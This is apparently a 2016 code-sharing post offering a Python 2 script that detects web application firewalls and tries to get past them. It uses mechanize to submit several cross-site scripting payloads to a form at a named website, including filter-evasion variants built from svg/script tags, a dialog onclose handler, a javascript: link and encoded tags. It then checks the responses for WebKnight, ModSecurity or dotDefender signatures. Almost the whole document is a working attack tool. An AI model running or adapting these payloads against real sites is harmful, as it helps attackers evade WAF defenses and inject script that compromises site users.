Description: Use Python to Detect Web Application Firewall and Bypass it!
Submitted on December 18, 2016 at 08:31 AM

Section 1 (Python)

import mechanize as mec

maliciousRequest = mec.Browser()

formName = 'waf'

maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")

maliciousRequest.select_form(formName)


crossSiteScriptingPayLoad = "<svg><script>alert&grave;1&grave;<p>"

maliciousRequest.form['data'] = crossSiteScriptingPayLoad



maliciousRequest.submit()
response =  maliciousRequest.response().read()

print response


if response.find('WebKnight') >= 0:
    print "Firewall detected: WebKnight"
elif response.find('Mod_Security') >= 0:
    print "Firewall detected: Mod Security"
elif response.find('Mod_Security') >= 0:
    print "Firewall detected: Mod Security"
elif response.find('dotDefender') >= 0:
    print "Firewall detected: Dot Defender"
else:
    print "No Firewall Present"



listofPayloads = ['<dialog open="" onclose="alert(1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg><script>prompt&#40 1&#41<i>', '<a href="&#1;javascript:alert(1)">CLICK ME<a>']

for payLoads in listofPayloads:

    maliciousRequest = mec.Browser()

    formName = 'waf'

    maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")

    maliciousRequest.select_form(formName)

    maliciousRequest.form['data'] = payLoads

    maliciousRequest.submit()

    response = maliciousRequest.response().read()

    print "---------------------------------------------------"

    if response.find('WebKnight') >= 0:
        print "Firewall detected: WebKnight"
    elif response.find('Mod_Security') >= 0:
        print "Firewall detected: Mod Security"
    elif response.find('Mod_Security') >= 0:
        print "Firewall detected: Mod Security"
    elif response.find('dotDefender') >= 0:
        print "Firewall detected: Dot Defender"
    else:
        print "No Firewall Present"

    print "---------------------------------------------------"


listofPayloads = ['&lt;b&gt;','\u003cb\u003e','\x3cb\x3e']

for payLoads in listofPayloads:

    maliciousRequest = mec.Browser()

    formName = 'waf'

    maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")

    maliciousRequest.select_form(formName)

    maliciousRequest.form['data'] = payLoads

    maliciousRequest.submit()

    response = maliciousRequest.response().read()

    print "---------------------------------------------------"

    print response

    print "---------------------------------------------------"